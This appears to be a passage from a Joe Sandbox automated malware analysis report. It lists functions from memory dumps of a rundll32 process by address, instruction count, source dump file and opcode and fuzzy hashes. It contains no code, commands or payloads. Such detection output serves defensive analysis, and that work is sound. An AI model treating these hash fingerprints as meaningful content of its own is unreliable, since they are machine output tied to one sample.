                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: b5dcb93f65b2f3f24ae4de412fd8d8f0fe3a3d0c41bceb2d3e2391e37e91a5f6
                                                                                                                                                                                                                                          • Instruction ID: 6bdfbe4d1d0d4cc3be9e68d0f8bb0547dbc04fab8fddd61ada66e0660bf2d666
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b5dcb93f65b2f3f24ae4de412fd8d8f0fe3a3d0c41bceb2d3e2391e37e91a5f6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89114230A00205AFDB14DFA9D850A9EBBF7EF8C315F158025E809A7391DF75AC45DBA0
                                                                                                                                                                                                                                          Function 04C31958 Relevance: .1, Instructions: 58COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: be0f090b503fa91c9fe25bcd3d071a80f13ffa110512ce72a2a1dce42da80306
                                                                                                                                                                                                                                          • Instruction ID: fccdecd32f78a7a2fe62febe10b9de0ddab7dcdaf05c9809ef4bfba293f0e3a5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: be0f090b503fa91c9fe25bcd3d071a80f13ffa110512ce72a2a1dce42da80306
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10115435A00114AFD714DF78D854AA9BBB3EF8C321F15802AD809A7741CF789C46CBA0
                                                                                                                                                                                                                                          Function 04C3AAE0 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 9513f79e1b71a98a9b999eabfe82429a8abd30cca6e96adbefb1f2b2677c1f6d
                                                                                                                                                                                                                                          • Instruction ID: 835ea7669f274578c082d13f3e47fc2c04265cffe623534997e749043773413c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9513f79e1b71a98a9b999eabfe82429a8abd30cca6e96adbefb1f2b2677c1f6d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D221BA78E00309DFDB04EFA4D490AAEBBF2EF89215F504599D945AB354DB30AA41CB91
                                                                                                                                                                                                                                          Function 030FD69F Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.1358694844.00000000030FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 030FD000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_30fd000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: bb6f562682ecfd4bb4bbbdc0362a4aa3d6694763a3d687d4c16d70a054081591
                                                                                                                                                                                                                                          • Instruction ID: 4b2327e8bd891d232f869baad60a19992c27cc0238529a65b23aa15b23684364
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb6f562682ecfd4bb4bbbdc0362a4aa3d6694763a3d687d4c16d70a054081591
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F11B176504280CFCB16CF10D9C4B16BFB2FB84324F28C6A9D9494F65AC336D456CBA2
                                                                                                                                                                                                                                          Function 04C31378 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: b1881477a8923edf3f3ae4f30c5bc2aef7242a2c5d45f8a3cf878875a8fd14d0
                                                                                                                                                                                                                                          • Instruction ID: 710ccfd9f1fc653b3d8a46b7d5c68e8ed21c92986cc153a8362878fa468b7333
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b1881477a8923edf3f3ae4f30c5bc2aef7242a2c5d45f8a3cf878875a8fd14d0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F210475D002098FDB20DFAAC880ADEFBF1FB48320F508529D519A7240CB796906CFA1
                                                                                                                                                                                                                                          Function 04C31380 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3e3a4368859489143e901fd99eb07d0aeb17089a088c117b1a68144af9a50617
                                                                                                                                                                                                                                          • Instruction ID: 812c3933fb78fe75a481c7abb9fa8032767b42b66f34fe2cf71566c8d47f2cf4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e3a4368859489143e901fd99eb07d0aeb17089a088c117b1a68144af9a50617
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 921113B4C002098FDB20DFAAC880B9EFBF5FB48320F508129D819A7240CB756905CFA1
                                                                                                                                                                                                                                          Function 04C31968 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 30ed71fc573c032b3dfbdd3c0d07a8f63e08acca61d4f9bf12a275352a8b6501
                                                                                                                                                                                                                                          • Instruction ID: b3fcd088227f60c5a62122f5d1777e9a71de3cdc53d66e156965531b6f7d0620
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 30ed71fc573c032b3dfbdd3c0d07a8f63e08acca61d4f9bf12a275352a8b6501
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38114231A00215BFDB14DFA8D454AA9BBB6EF8C311F15402AE80DA7345CF795C45CBA0
                                                                                                                                                                                                                                          Function 04C31440 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 0bc0bf3456844e8f5f741fb9494d4ef22368d03a75ab8cd1997cb0327e05b7ae
                                                                                                                                                                                                                                          • Instruction ID: 534c5f7f13feb18fecd39871399c981fd0c85b66c33eb5fccde940c07ad8a5fd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0bc0bf3456844e8f5f741fb9494d4ef22368d03a75ab8cd1997cb0327e05b7ae
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE014C30A053051FDB195F3868712167FD6DEC110230A08AFC849CF152FD14ED0983E1
                                                                                                                                                                                                                                          Function 04C3B920 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d14292485d4b848599e7e9bc02c033452848fb23b883ed8c48d082d9d2963641
                                                                                                                                                                                                                                          • Instruction ID: c78b4536b0eb61a8573edd93846def6a81fddeeddd96b4434ab756c7065e6bba
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d14292485d4b848599e7e9bc02c033452848fb23b883ed8c48d082d9d2963641
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4101D6717043404FE724CA29C890A7BBBEADF89365714807AE84DCB752EA31FC01C790
                                                                                                                                                                                                                                          Function 04C3B070 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 72752a6b6f2e91c16646fb5fab05f956fb90019799e6de72e4a55c52fb5fe9a8
                                                                                                                                                                                                                                          • Instruction ID: acb12c56e71f62a3946cb7ecf2fc637bc5bcf67743572493462b0966ec8810d1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 72752a6b6f2e91c16646fb5fab05f956fb90019799e6de72e4a55c52fb5fe9a8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C01A2317042118FD714DB699880AAEFBE6EFC9250B14C27AE41CC7255EA31FC46CB91
                                                                                                                                                                                                                                          Function 04C31829 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: ab099dfe61bedb4d7f8b8eef033fca06d61293c1f0e10d6624d288f3fa168353
                                                                                                                                                                                                                                          • Instruction ID: 55c7efd4cfe6e555b20ff60e6752d308e1a18fe49f77b36900969dedbf092a60
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab099dfe61bedb4d7f8b8eef033fca06d61293c1f0e10d6624d288f3fa168353
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5401F932F0011587FB14A6A985543EF27F79BC8715F29802DD005F7384CE756D079795
                                                                                                                                                                                                                                          Function 04C3CB90 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: f349bd9d7ff412b157f6ce98ed7636b56329e150cca0dfbbb25d373ef1464113
                                                                                                                                                                                                                                          • Instruction ID: c05bebcbc6692bb6d1be5f25c1411e44b9a0f80cc84e65c4bccbc0c81bd7069d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f349bd9d7ff412b157f6ce98ed7636b56329e150cca0dfbbb25d373ef1464113
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0FF0903B3081144FA7048A6EBC84A2FB7EAFBC5A6A31401BAE509C3360DF61DC018790
                                                                                                                                                                                                                                          Function 030FD01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.1358694844.00000000030FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 030FD000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_30fd000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 905e3f3fad6440d0be3a7b7b2adfc08db9db4e74fb1845d0f6558c9a053de335
                                                                                                                                                                                                                                          • Instruction ID: 301caa167b98b52903eecf1f6cb159ed1558958c57ae02d10511acba518a03fb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 905e3f3fad6440d0be3a7b7b2adfc08db9db4e74fb1845d0f6558c9a053de335
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D501F7314093009FE720CA21CC84B66FFD8DF41225F18C55ADE480B586C2789845CAB1
                                                                                                                                                                                                                                          Function 030FD007 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.1358694844.00000000030FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 030FD000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_30fd000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: e7838fb9e5ee6be1a2637220271189efce1589dab0567ef1f0914e06b805400c
                                                                                                                                                                                                                                          • Instruction ID: 5504eb0d21aaeb9ab7ec1a7b933148490ca7a85c1a362a4c76e87fee97af5a8e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e7838fb9e5ee6be1a2637220271189efce1589dab0567ef1f0914e06b805400c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1010C7140E3C09FD7128B258894B52BFB8DF47224F1D81DBD9888F6A7C2699849DB72
                                                                                                                                                                                                                                          Function 04C346A0 Relevance: .0, Instructions: 42COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3385d531455da56bf1fed1410f334608481ed0719da2085d998ef7971ce1c6b8
                                                                                                                                                                                                                                          • Instruction ID: 95fa8ef2e93f6c5516488e6b503a772919fc5ecd67b4af3d00c648c80e040c9d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3385d531455da56bf1fed1410f334608481ed0719da2085d998ef7971ce1c6b8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62F0F675B013049FDB049F68E4059A977BAEFD9316B120096F946CB261DB349C03CB55
                                                                                                                                                                                                                                          Function 04C3CB7F Relevance: .0, Instructions: 42COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: efe43ddd60745b0280b5388efe2aeec04ebe31f02f442ba7fcb4fc0690d1721f
                                                                                                                                                                                                                                          • Instruction ID: 1e351421ff5b7fd91c56d9aecfbf96ba38af86c86c1a19409d456d91aa94301d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: efe43ddd60745b0280b5388efe2aeec04ebe31f02f442ba7fcb4fc0690d1721f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1F090363052255FD3108F6AE894A6AB7FAFFC965931101EEE408C7262DB30DD06C790
                                                                                                                                                                                                                                          Function 04C3E3EB Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3425c9a1913a265c112d332c8e22c2257a459a4152931a295303828d4e242e06
                                                                                                                                                                                                                                          • Instruction ID: 19117635fb52ae4d3ce90c03c1334c2770c0019a774fab451ddc90cf81151ab1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3425c9a1913a265c112d332c8e22c2257a459a4152931a295303828d4e242e06
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9001D17AB102105FEB119A98D8507BE7BA3EBC8221F14825AE6056B780DF747D068BC1
                                                                                                                                                                                                                                          Function 04C3E36A Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 378ee17d863706ca5806b2c9d05e65a913dfd013142c45db01b72079764f2d60
                                                                                                                                                                                                                                          • Instruction ID: 5b550be9b2d04532b537ce8c0eadeccd10ebc962ceed3757c0c3e76154d16917
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 378ee17d863706ca5806b2c9d05e65a913dfd013142c45db01b72079764f2d60
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12F0467AB103105FEB119698D8107BD3BA3FBC8661F18865AE6056F780DF74BD068BD0
                                                                                                                                                                                                                                          Function 04C3AF00 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: ee0938aa3c17daed17487d52f59da80778bc3e9595fb1c1f3f4afbd1e5df6a72
                                                                                                                                                                                                                                          • Instruction ID: 1b4c112482d15fad4b9e62ae67c591f7989aee40d8d27110a83855ecc6af90ab
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ee0938aa3c17daed17487d52f59da80778bc3e9595fb1c1f3f4afbd1e5df6a72
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 56F0E2B27043155F972486AE688099BBBEAEFC9161314812AF40DC7212EE64EC0283A4
                                                                                                                                                                                                                                          Function 04C356D0 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: e6a311bdd636aa9bad6ed74f313dea60866e85e24aec01e41a6333cd31ace5af
                                                                                                                                                                                                                                          • Instruction ID: f921de5f64d972c76b4435fd09ab1e59f801a723244695b12a4d3e2100d72d62
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e6a311bdd636aa9bad6ed74f313dea60866e85e24aec01e41a6333cd31ace5af
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 81F0C8B47003046FD324A7A5D850AAEBBD6EBC5260740472DD10A8FB40CFB5680A47E1
                                                                                                                                                                                                                                          Function 04C357A8 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 52ab4314112d79ea7a6ddca98087250fe5dc91d704a6289ddfa911a5279c9fed
                                                                                                                                                                                                                                          • Instruction ID: 18df3103455dc34199d8e103c11ddbe5eee1fd4561d5acba5b689ea43c6de2db
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 52ab4314112d79ea7a6ddca98087250fe5dc91d704a6289ddfa911a5279c9fed
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7F0E9343003005FE721DB28D860E9A37EAEFCA2607040569E985CF711EB20FC06C795
                                                                                                                                                                                                                                          Function 04C368D1 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3227fe0cef144de28448019f76a4ee69720a040bfd5d73e798a446521bb3988a
                                                                                                                                                                                                                                          • Instruction ID: 8a798d4194f3f559459e3b49fb45c3d3d638c398cca50b0e814752b9d13db9e2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3227fe0cef144de28448019f76a4ee69720a040bfd5d73e798a446521bb3988a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10F09036704255AFC722CF5DD8409C9BFFAEF8A31030A80E6E598CB222D731E905CB90
                                                                                                                                                                                                                                          Function 04C346C8 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 23fb1c152fc242729b17c35b5edb0f8a71b20cd5eda0bcb561ac682112c0e268
                                                                                                                                                                                                                                          • Instruction ID: 4812a8616a115ad2a39db0216814fbb4a114be28bb6aa1cd2f272ed13279391a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 23fb1c152fc242729b17c35b5edb0f8a71b20cd5eda0bcb561ac682112c0e268
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 72F09A74F04308AFCB04EFA8E4454DDFBF5EB84311F0081AAE408D7251EA385A0A8B82
                                                                                                                                                                                                                                          Function 04C36038 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 79115cc3a7942cc6ba7225d0c77799b2ea8b1bfb75c19be2c4c58c948c4cd76c
                                                                                                                                                                                                                                          • Instruction ID: 3d870fdde7b42c77615053e2e75d43463d7ea8e7c7ab390d6bce90ea52b7c07e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 79115cc3a7942cc6ba7225d0c77799b2ea8b1bfb75c19be2c4c58c948c4cd76c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04F02232208BA09FC3318B58E40459ABFF4AF82319B044D5EC0C64BA62DBF9B549C786
                                                                                                                                                                                                                                          Function 04C3A369 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: ea2df35850f967c243500f0816ed1b3cca9864dca6f6acf8093b936f0db819c0
